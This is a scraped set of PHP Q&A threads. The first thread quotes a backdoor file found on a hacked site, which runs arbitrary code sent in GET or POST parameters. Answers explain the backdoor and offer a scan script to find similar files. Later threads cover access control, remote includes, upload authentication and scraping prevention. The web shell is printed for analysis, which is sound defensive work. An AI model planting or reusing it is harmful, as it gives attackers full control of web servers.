hacked website unusual php file - php

I have a file called q.php that has appeared on one of my websites. The site has been hacked. Does anyone know what the file does?
<? error_reporting(0); if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
<?=eval(@$_GET['q']);?>
<?php
if (!isset($_POST['eval'])) {die('');}
eval($_POST['eval']);
?>

It looks like it lets anyone execute PHP code passed in as the 'q' parameter of a GET request, or any code in the 'eval' parameter of a POST request. It suppresses all associated errors.
This is as bad as it gets, and if your site isn't down already, I'd recommend taking it offline and auditing your servers very closely.

It runs the PHP code sent in the ?q= GET argument or the POST eval argument.
I would advise you to clean up your server and start again from a clean installation.

It will enable the attacker to execute any code.
If you pass code to that script, either via ?q=code in the URL or in the eval parameter of a POST request, it will get executed.
So basically this is a remote code execution backdoor.

Nice. Not sure what the first line is for, but the two eval lines allow someone to execute any code they please on your server by passing it in the URL or POST data respectively.

The bigger question is how the attackers were able to upload the file in the first place. What that file contains is quite typical of code inserted so that attackers can execute code on your server without permission.
Merely deleting this file and any other files with rogue code in them does not fix the problem, which is that attackers are somehow able to upload files into your website's file repository (see the scanning sketch after the breakdown below).
At any rate, here is a complete breakdown:
1/ error_reporting(0);
Sets the error reporting to off.
2/ if(@$_GET['wpth']){ echo "./mywebsite.co.uk/index.htm"; }?>
When the URL is called with ?wpth=something appended, the string ./mywebsite.co.uk/index.htm is echoed at the top of the page.
3/ <?=eval(@$_GET['q']);?>
This will execute any code included in the value of q, e.g. yourdomain.com/?q=base64_decode(%27somelongstringhere%27)
4/ if (!isset($_POST['eval'])) {die('');}
Kills page execution if a POST variable called eval is not set.
5/ eval($_POST['eval']);
Executes any code posted from a remotely hosted form where the form variable is called eval.
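Since deleting q.php alone doesn't address how it got there, here is a minimal sketch of a scan you could run while auditing; the file name, regex, and command-line usage are my own, not from the question, and a match is only a lead for manual review:
<?php
// find_backdoors.php (hypothetical helper), run from the command line:
//   php find_backdoors.php /path/to/webroot
// Flags PHP files that eval() raw request input, as q.php does above.
$webroot = isset($argv[1]) ? $argv[1] : '.';
$pattern = '/eval\s*\(\s*@?\$_(GET|POST|REQUEST)/i';

$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($webroot));
foreach ($files as $file) {
    if ($file->isFile() && strtolower($file->getExtension()) === 'php') {
        if (preg_match($pattern, file_get_contents($file->getPathname()))) {
            echo "Suspicious: " . $file->getPathname() . PHP_EOL;
        }
    }
}
?>
This only catches the crudest pattern; obfuscated backdoors (base64_decode, variable functions, code hidden in uploaded files) need a full audit or a clean reinstall, as the other answers say.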

Related

Allow window.location but prevent direct access to a PHP file

I have a script file named script.php which is accessed from another PHP file called main.php through window.location. I want to prevent direct access to the file, i.e., no one should be able to type script.php in the URL bar and view the contents of the file, but I want my main.php to still be able to redirect to script.php using window.location. Is there any way to do this?
I have tried using debug_backtrace() and preg_match(), but these also block the window.location redirect from main.php. Any way to get around this?
I'm not really sure what you want to do or why. There is no way to allow only a script to open a URL, because the browser handles the redirect either way.
Normally you check in the file itself whether the user is allowed to use it. So you need some logic to tell your script whether the user should see it; otherwise you can take some other action, like displaying an error or redirecting back to main.php.
Just some quick ideas ...
Idea 1.) If possible, you can include() the script.php in main.php and block the direct access via .htaccess. Then you don't need a redirect and no one can access it directly.
Idea 2.) Set a session variable in main.php like $_SESSION["allow"] = true; and check it again in script.php. Afterwards set the value to false, so the next call will fail (see the sketch after this list).
Idea 3.) Add a parameter to the file call, like script.php?allow=true. But in this case, all users who know the parameter could call it.
Idea 4.) Add a custom parameter to the redirect which is only valid for a given time. To keep it simple, something like PHP's time(). Check whether the parameter is within a short time limit. In this case, though, the redirect URL has to be generated right when main.php starts the redirect; otherwise the request could already be too old.
Those are my ideas. Hopefully something here gives you a hint on how to do it.
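A minimal sketch of idea 2, using the file names from the question (the session key name is arbitrary):
<?php
// main.php: set a one-shot flag just before the JavaScript redirect.
session_start();
$_SESSION['allow'] = true;
echo '<script>window.location = "script.php";</script>';
?>

<?php
// script.php: refuse the request unless main.php set the flag.
session_start();
if (empty($_SESSION['allow'])) {
    header('HTTP/1.1 403 Forbidden');
    exit('No direct access.');
}
$_SESSION['allow'] = false; // one-shot: a later direct call fails
// ... rest of script.php ...
?>
Because the flag is cleared on first use, typing script.php directly into the URL bar afterwards just yields the 403.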

Constant set using define() not working in included PHP file

I have this code inside of my header
<?php
define('RELPATH','http://www.saint57records.com/');
include_once(RELPATH.'sidebar.php');
?>
and an example line of code in the sidebar
<img style="margin:10px;" src="<?php print RELPATH;?>images/logo.png" width="60px"/>
but when it gets to the page, it includes the file correctly, yet all the links inside the file just print RELPATH instead of the web URL, like this:
<img style="margin:10px;" src="RELPATHimages/logo.png" width="60px"/>
It works fine on the other pages of my website, just not inside WordPress. Does anyone know what might be causing this issue?
The short answer is to provide a filesystem path to RELPATH, not a web URL.
The long answer is that when you use a web URL to include a PHP file, the PHP file is treated like an external resource: it is requested remotely, executed in a process of its own, and only its output is returned. A constant defined beforehand cannot have any effect in that remote resource.
If http://www.saint57records.com/ is on a different server, you'll have to pass RELPATH to it some other way, e.g. through a GET variable (which you'd have to sanitize with htmlentities() prior to use.) However, including content from a remote server in this way isn't good practice. It'll slow down your page as it'll make an expensive web request. If the target server is down, your page will time out.
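A minimal sketch of the filesystem-path fix, assuming sidebar.php sits next to the including file (a hypothetical layout; adjust the path to yours):
<?php
// Keep RELPATH as a URL: sidebar.php uses it to build <img> and link URLs.
define('RELPATH','http://www.saint57records.com/');
// Include by filesystem path so sidebar.php runs in this same process
// and can still see the constant.
include_once(__DIR__.'/sidebar.php');
?>
With the include running locally, <?php print RELPATH;?> inside sidebar.php expands to the URL as intended.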

Very strange php include behavior..

I am experiencing some very strange behavior when including a php file.
I need to load a script that is not on the same domain as the page that will be calling it.
I have already created a system that works using cURL, but I just recently found out that many of the sites that will need access to this script do not have cURL installed.
I did, however, notice that these sites have allow_url_fopen set to on. With this knowledge I got started creating a new system that would let me just include the script on the remote site.
Just testing this out, I coded the script test.php as follows:
<?php
echo("test");
?>
I include this script on the remote page using:
<?php
include("http://mydomain.com/script.php");
?>
and it works no problem and "test" is printed at the top of the page.
However, if I add a function to the script and try to call the function from the page, it crashes.
To make it worse, this site has PHP errors turned off and I have no way of turning them on.
To fully make sure that I didn't just mess up the code, I made my test.php look like this:
<?php
function myfunc()
{
return "abc";
}
?>
Then on the page including the file:
<?php
include("http://mydomain.com/script.php");
echo(myfunc());
?>
And it crashes.
Any ideas would be greatly appreciated.
This is not odd behavior: since you load the file over HTTP, it is interpreted on the remote server before anything reaches your include.
Because only the script's output is sent, none of its functions are visible on your side.
Either load it over FTP or create an API for the functions.
My guess: The PHP of http://mydomain.com/script.php is interpreted by the web server of mydomain.com. All you're including is the result of that script. For a simple echo("test"), that's "test". Functions do not produce any output and are not made available to the including script. Confirm this by simply visiting http://mydomain.com/script.php in your browser and see what you get. You would need to stop mydomain.com from actually interpreting the PHP file and just returning it as pure text.
But: this sounds like a bad idea to begin with. Cross-domain includes are an anti-pattern. Not only do they open you up to security problems, they also make every page load unnecessarily slow. If a cross-domain include is the answer, you're asking the wrong question.
You are including the client-side output of test.php rather than the server-side source code. Renaming test.php to test.phpc would prevent the server from executing the script, but exposing source files this way is dangerous from a security point of view.
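A minimal sketch of the API route suggested above (the api.php name is hypothetical): the remote server returns the function's result as JSON instead of its source, and the consuming site reads it with file_get_contents(), which works here because allow_url_fopen is on.
<?php
// api.php on mydomain.com: expose the result, not the definition.
function myfunc()
{
    return "abc";
}
header('Content-Type: application/json');
echo json_encode(myfunc());
?>

<?php
// On the consuming site:
$value = json_decode(file_get_contents('http://mydomain.com/api.php'));
echo $value; // prints "abc"
?>
Each server keeps executing its own code, which avoids the cross-domain include the answers above warn against.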

Cancel an HTTP POST request server side

I am trying to write a script for uploading large files (>500MB). I would like to do some authentication before the upload is processed, eg:
$id = $_GET['key'];
$size = $_GET['size'];
$time = $_GET['time'];
$signature = $_GET['signature'];
$secret = 'asdfgh123456';
if(sha1($id.$size.$time.$secret) != $signature){
echo 'invalid signature';
exit;
}
// process upload...
Unfortunately PHP only runs this code after the file has already been uploaded to a temporary directory, taking up valuable server resources. Is there a way to do this before the upload happens? I have tried similar things with Perl/CGI but the same thing happens.
Wow, already 5 answers saying it can't be done. mod_perl to the rescue: there you can reject a request before the whole request body is uploaded.
Apache is taking care of the upload before the PHP script is even invoked so you won't be able to get at it.
You can either split up the process into two pages (authentication, file upload page) or, if you need to do it all in one page, use an AJAX-esque solution to upload the file after authentication parameters are checked.
As far as I know, you cannot do that in PHP. PHP script is launched in response to a request, but a request is not "sent" until the file is uploaded, since the file being uploaded is a part of the request.
This is definitely not possible inside the PHP script you're uploading to.
The most simple possibility is indeed to provide authentication one step before the upload takes place.
If that is not an option, one slightly outlandish possibility comes to mind - using a RewriteMap and mapping it to an external program (it should be possible to make that program a PHP script).
Using RewriteMap it is possible to rewrite a URL based on the output of a command-line program. If you use this directive to call a (separate) PHP script (you won't be able to use the user's session, though!), you would have access to the GET parameters before the request is processed.
If the processing fails (= the credentials are invalid), you could redirect the request to a static resource, which would at least prevent PHP from starting up. (I assume the upload will still be hogging some resources anyway, but probably fewer than if it were handed to PHP.)
No guarantees whether this'll work! I have no own experience with RewriteMap.
This is due to the fact that each HTTP request is a single entity that contains all of the form/POST data, including the file upload data.
As such, I don't believe it's possible to handle a file upload request in this fashion irrespective of which scripting language you use.
I don't think you can do this. The best you can probably do is run an AJAX call onSubmit to do your validation first, then, if it returns valid, execute the POST to upload the file. You could set a $_SESSION variable in your AJAX script if the authentication is valid, then check for that session variable in the upload script to allow the upload.
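A minimal sketch of that split (file and field names are hypothetical), reusing the signature check from the question. Note it only avoids processing an unauthorised upload; the request body is still received by the server before upload.php runs:
<?php
// auth.php: call this first, before the client starts the upload.
session_start();
$secret = 'asdfgh123456';
$expected = sha1($_GET['key'] . $_GET['size'] . $_GET['time'] . $secret);
if ($expected !== $_GET['signature']) {
    exit('invalid signature');
}
$_SESSION['upload_ok'] = true;
echo 'ok';
?>

<?php
// upload.php: refuse to process the file unless auth.php approved this session.
session_start();
if (empty($_SESSION['upload_ok'])) {
    exit('not authorised');
}
unset($_SESSION['upload_ok']); // one-shot approval
// 'file' is the assumed form field name; the target path is a placeholder.
move_uploaded_file($_FILES['file']['tmp_name'],
    '/path/to/uploads/' . basename($_FILES['file']['name']));
?>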

how to prevent PHP's file_get_contents()

One of my PHP pages returns data like this:
<?php
//...
echo "json string";
?>
But someone else uses file_get_contents() to grab my data and use it on another website.
Can anybody tell me what I can do to prevent this from happening?
I thought about getting the requesting domain name and echoing something else, but I don't know the function to get the requester's domain name, and if the request is sent by a server that won't help anyway. My English is poor, so please bear with me.
You can also use sessions. If somewhere in your application, before the user gets the JSON data, you start a session, then on the page outputting the JSON data you can check for that session variable. This way only users who have passed through the session-generating page can view your output.
Suppose you have a page A.php that generates the session; use this code before outputting anything on that page:
session_start();
$_SESSION['approvedForJson'] = true;
Then on the page that outputs the JSON data, call session_start() again before outputting anything; the beginning of your PHP code is a good place for it.
Then, before outputting the JSON data, check whether the session variable for approved users exists:
if ( isset($_SESSION['approvedForJson']) && $_SESSION['approvedForJson'] ) {
echo "json data";
} else {
// bad request
}
You can use $_SERVER['REMOTE_ADDR'] to get the client's IP address. You can also check $_SERVER['HTTP_REFERER'] and block external requests that way, but it's less reliable. There are probably a few other techniques involving $_SERVER that you can try.
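A minimal sketch of the Referer check mentioned above (the domain is a placeholder). The Referer header is client-supplied and easily spoofed or omitted, so treat this as a deterrent rather than real protection:
<?php
// Only serve the JSON when the request appears to come from our own pages.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if (parse_url($referer, PHP_URL_HOST) !== 'www.example.com') {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
echo "json string"; // the real JSON output goes here
?>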
You're fighting an uphill battle here. I am assuming your server-side process that responds with JSON is being consumed via JavaScript in your users' browsers, so there is no easy way to hide it. You might try some of the techniques used to prevent CSRF (see http://en.wikipedia.org/wiki/Cross-site_request_forgery). If you developed the client to pass along some session token that is unique per client, you could reduce some of the problem. But chances are whoever is stealing your data is going to figure out whatever mechanism you put in place, assuming this is some sort of AJAX thing. If it's a server-to-server thing then, as sli mentions, setting up some restrictions based on the remote IP would help, and setting up some sort of API authentication tokens would help even more (see OAuth for some pointers).
You could also use .htaccess with Apache to block every external request to the page if it is only ever called internally, or block every request that is not from your domain:
Google search thingie
EDIT
You could also use a PHP wrapper which includes the file that should not be readable directly. For example, you have file.php:
<?php
$allowedFiles[] = 'somefile.php';
$allowedFiles[] = 'someotherFile.php';
$allowedFiles[] = 'jsonReturnFile.php';
if(in_array($_GET['file'], $allowedFiles)){
include( "include/".$_GET['file'] );
}
?>
Then you can allow file_get_contents() on that wrapper and write a RewriteRule in your .htaccess to disallow any request to the include/ folder:
RewriteRule ^include/ - [F,NC]
That will return a 403 forbidden error for a request to that directory or any file in the directory.
Then you can make your JSON request to something like: file.php?file=jsonReturnFile.php&someOtherParamReadByJsonFile=1
And when someone tries to get the file contents of the JSON file directly, they will get the forbidden error, while fetching the contents of file.php itself won't return anything useful.
